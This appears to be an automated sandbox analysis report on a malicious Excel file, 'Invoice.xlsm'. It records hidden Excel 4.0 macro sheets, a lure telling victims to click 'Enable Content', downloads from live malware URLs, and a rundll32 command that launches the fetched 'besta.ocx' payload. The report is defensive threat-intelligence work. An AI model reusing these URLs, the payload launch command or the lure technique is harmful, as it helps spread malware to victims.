Loading ...

Play interactive tourEdit tour

Windows Analysis Report Invoice.xlsm

Overview

General Information

Sample Name:Invoice.xlsm
Analysis ID:532378
MD5:41b25400c2b31b922dd090e1251b37b8
SHA1:b543cbb86a4e50506fb9be2ac455e4e606948d65
SHA256:734577b2ffb53ddf37d71db650178c94c017f8749a9f9497d2f76abd876418a6
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Detected potential crypto function
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2208 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • rundll32.exe (PID: 1724 cmdline: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2932256944 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2932256944, CommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2932256944, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2208, ProcessCommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2932256944, ProcessId: 1724

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: Invoice.xlsmVirustotal: Detection: 22%Perma Link
    Source: Invoice.xlsmReversingLabs: Detection: 20%
    Antivirus detection for URL or domainShow sources
    Source: http://crackedshop.org/9/q080U0ARYYL/Avira URL Cloud: Label: malware
    Source: https://ascarya.digital/wp-content/ZH4rirUAvira URL Cloud: Label: malware
    Source: https://ascarya.digital/wp-content/ZH4rirU/Avira URL Cloud: Label: malware
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 67.207.81.73:443
    Source: global trafficDNS query: name: ascarya.digital
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 67.207.81.73:443
    Source: global trafficHTTP traffic detected: GET /9/q080U0ARYYL/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: crackedshop.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: crackedshop.orgConnection: Keep-Alive
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: EXCEL.EXE, 00000000.00000003.1023489983.0000000005A45000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.1225541144.0000000005A08000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.1021276243.0000000005A42000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comse equals www.linkedin.com (Linkedin)
    Source: rundll32.exe, 00000004.00000002.963320714.0000000000950000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: EXCEL.EXE, 00000000.00000003.1023489983.0000000005A45000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.1225541144.0000000005A08000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.1021276243.0000000005A42000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EXCEL.EXE, 00000000.00000003.1023489983.0000000005A45000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.1225541144.0000000005A08000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.1021276243.0000000005A42000.00000004.00000001.sdmpString found in binary or memory: http://crackedshop.org/cgi-sys/suspendedpage.cgi
    Source: EXCEL.EXE, 00000000.00000003.1023489983.0000000005A45000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.1225541144.0000000005A08000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.1021276243.0000000005A42000.00000004.00000001.sdmpString found in binary or memory: http://crackedshop.org/cgi-sys/suspendedpage.cgi5
    Source: rundll32.exe, 00000004.00000002.963320714.0000000000950000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000004.00000002.963320714.0000000000950000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
    Source: EXCEL.EXE, 00000000.00000002.1225027533.0000000005257000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.963514761.0000000000B37000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: EXCEL.EXE, 00000000.00000002.1225027533.0000000005257000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.963514761.0000000000B37000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: EXCEL.EXE, 00000000.00000002.1225541144.0000000005A08000.00000004.00000001.sdmpString found in binary or memory: http://purl.or
    Source: EXCEL.EXE, 00000000.00000002.1225495153.00000000058A6000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
    Source: EXCEL.EXE, 00000000.00000002.1225495153.00000000058A6000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
    Source: EXCEL.EXE, 00000000.00000002.1225027533.0000000005257000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.963514761.0000000000B37000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: EXCEL.EXE, 00000000.00000002.1225027533.0000000005257000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.963514761.0000000000B37000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000004.00000002.963320714.0000000000950000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: EXCEL.EXE, 00000000.00000002.1225027533.0000000005257000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.963514761.0000000000B37000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000004.00000002.963320714.0000000000950000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000004.00000002.963320714.0000000000950000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: EXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.dig
    Source: EXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digit
    Source: EXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital
    Source: EXCEL.EXE, 00000000.00000002.1225583101.0000000005A7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.1023508307.0000000005A7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.1021291549.0000000005A7F000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/
    Source: EXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/w
    Source: EXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/wp-c
    Source: EXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/wp-con
    Source: EXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/wp-conte
    Source: EXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/wp-content%https://ascarya.digital/wp-content/ZH&https://ascarya.digital/wp-
    Source: EXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/wp-content/ZH4rirU
    Source: EXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpString found in binary or memory: https://ascarya.digital/wp-content/ZH4rirU/
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5EEDDA76.pngJump to behavior
    Source: unknownDNS traffic detected: queries for: ascarya.digital
    Source: global trafficHTTP traffic detected: GET /9/q080U0ARYYL/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: crackedshop.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: crackedshop.orgConnection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
    Source: Screenshot number: 4Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
    Source: Screenshot number: 4Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 16 17 18 ^
    Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
    Source: Screenshot number: 8Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
    Source: Screenshot number: 8Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 16 17 18 ^
    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
    Source: Document image extraction number: 0Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
    Source: Document image extraction number: 0Screenshot OCR: Enable Content" button
    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
    Source: Document image extraction number: 1Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" button
    Source: Invoice.xlsmMacro extractor: Sheet name: Buk2
    Source: Invoice.xlsmMacro extractor: Sheet name: Buk5
    Source: Invoice.xlsmMacro extractor: Sheet name: Buk1
    Source: Invoice.xlsmMacro extractor: Sheet name: Buk7
    Source: Invoice.xlsmMacro extractor: Sheet name: EFEWF
    Source: Invoice.xlsmMacro extractor: Sheet name: Buk3
    Source: Invoice.xlsmMacro extractor: Sheet name: Buk4
    Source: Invoice.xlsmMacro extractor: Sheet name: Buk6
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E67430_2_024E6743
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E63400_2_024E6340
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E67530_2_024E6753
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E66E80_2_024E66E8
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E66F30_2_024E66F3
    Source: workbook.xmlBinary string: \Desktop\Fil\1d\Cir\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{1D31CE62-AFF1-46C8-8AB3-51A0A09BC8BF}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Ss1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Ss1br2" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Ssbr3" sheetId="4" state="hidden" r:id="rId4"/><sheet name="EFEWF" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Buk1" sheetId="6" state="hidden" r:id="rId6"/><sheet name="Buk2" sheetId="7" state="hidden" r:id="rId7"/><sheet name="Buk3" sheetId="8" state="hidden" r:id="rId8"/><sheet name="Buk4" sheetId="9" state="hidden" r:id="rId9"/><sheet name="Buk5" sheetId="10" state="hidden" r:id="rId10"/><sheet name="Buk6" sheetId="11" state="hidden" r:id="rId11"/><sheet name="Buk7" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="LKLW">EFEWF!$D$3</definedName><definedName name="SASA">EFEWF!$D$17</definedName><definedName name="SASA1">EFEWF!$D$19</definedName><definedName name="SASA2">EFEWF!$D$21</definedName><definedName name="_xlnm.Auto_Open">EFEWF!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: 3F61.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: Invoice.xlsmVirustotal: Detection: 22%
    Source: Invoice.xlsmReversingLabs: Detection: 20%
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2932256944
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2932256944
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2932256944Jump to behavior
    Source: rundll32.exe, 00000004.00000002.963320714.0000000000950000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Invoice.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC80F.tmpJump to behavior
    Source: classification engineClassification label: mal76.expl.winXLSM@3/6@2/2
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Invoice.xlsmInitial sample: OLE zip file path = xl/worksheets/sheet4.xml
    Source: Invoice.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: Invoice.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: Invoice.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
    Source: Invoice.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: Invoice.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: Invoice.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: 3F61.tmp.0.drInitial sample: OLE indicators vbamacros = False
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E6743 rdtsc 0_2_024E6743
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E6743 rdtsc 0_2_024E6743
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Source: EXCEL.EXE, 00000000.00000002.1221808694.0000000000820000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: EXCEL.EXE, 00000000.00000002.1221808694.0000000000820000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: EXCEL.EXE, 00000000.00000002.1221808694.0000000000820000.00000002.00020000.sdmpBinary or memory string: Program Manager<

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Path InterceptionProcess Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Invoice.xlsm23%VirustotalBrowse
    Invoice.xlsm20%ReversingLabsDocument-Office.Downloader.EncDoc

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    crackedshop.org0%VirustotalBrowse
    ascarya.digital4%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://crackedshop.org/cgi-sys/suspendedpage.cgi4%VirustotalBrowse
    http://crackedshop.org/cgi-sys/suspendedpage.cgi0%Avira URL Cloudsafe
    http://crackedshop.org/9/q080U0ARYYL/4%VirustotalBrowse
    http://crackedshop.org/9/q080U0ARYYL/100%Avira URL Cloudmalware
    http://purl.or0%Avira URL Cloudsafe
    http://crackedshop.org/cgi-sys/suspendedpage.cgi50%Avira URL Cloudsafe
    https://ascarya.digital/wp-con0%Avira URL Cloudsafe
    https://ascarya.digit0%Avira URL Cloudsafe
    https://ascarya.digital/wp-content/ZH4rirU100%Avira URL Cloudmalware
    https://ascarya.digital/wp-conte0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://schemas.open0%URL Reputationsafe
    https://ascarya.digital/wp-content%https://ascarya.digital/wp-content/ZH&https://ascarya.digital/wp-0%Avira URL Cloudsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://schemas.openformatrg/package/2006/r0%URL Reputationsafe
    https://ascarya.digital/w0%Avira URL Cloudsafe
    https://ascarya.digital0%Avira URL Cloudsafe
    https://ascarya.digital/0%Avira URL Cloudsafe
    https://ascarya.dig0%Avira URL Cloudsafe
    https://ascarya.digital/wp-content/ZH4rirU/100%Avira URL Cloudmalware
    https://ascarya.digital/wp-c0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    crackedshop.org
    94.102.59.39
    truefalseunknown
    ascarya.digital
    67.207.81.73
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://crackedshop.org/cgi-sys/suspendedpage.cgifalse
    • 4%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://crackedshop.org/9/q080U0ARYYL/true
    • 4%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.963320714.0000000000950000.00000002.00020000.sdmpfalse
      high
      http://investor.msn.comrundll32.exe, 00000004.00000002.963320714.0000000000950000.00000002.00020000.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000004.00000002.963320714.0000000000950000.00000002.00020000.sdmpfalse
          high
          http://purl.orEXCEL.EXE, 00000000.00000002.1225541144.0000000005A08000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crackedshop.org/cgi-sys/suspendedpage.cgi5EXCEL.EXE, 00000000.00000003.1023489983.0000000005A45000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.1225541144.0000000005A08000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.1021276243.0000000005A42000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://ascarya.digital/wp-conEXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://ascarya.digitEXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://ascarya.digital/wp-content/ZH4rirUEXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmptrue
          • Avira URL Cloud: malware
          unknown
          https://ascarya.digital/wp-conteEXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
